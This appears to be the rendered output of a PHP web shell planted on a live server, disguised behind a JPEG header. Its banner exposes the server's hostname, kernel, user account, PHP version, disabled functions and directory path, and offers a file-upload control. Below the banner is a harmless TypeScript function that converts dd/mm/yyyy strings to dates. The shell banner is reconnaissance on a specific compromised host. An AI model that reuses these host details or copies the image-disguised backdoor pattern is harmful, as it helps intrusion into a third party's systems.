ÿØÿà JFIF ` ` ÿþ
|
Server : Apache System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64 User : farolpborg ( 1053) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /var/www/node_services/sebraevisitas/src/utils/conversors/ |
Upload File : |
function convertDdMmYyyyToDate(dateString:string) {
// Split the date string into day, month, and year components
const parts = dateString.split('/');
const day = parseInt(parts[0], 10);
const month = parseInt(parts[1], 10); // Month is 0-indexed in JavaScript Date
const year = parseInt(parts[2], 10);
// Create a new Date object. Note: month is 0-indexed (January is 0, December is 11)
return new Date(year, month - 1, day);
}
export default convertDdMmYyyyToDate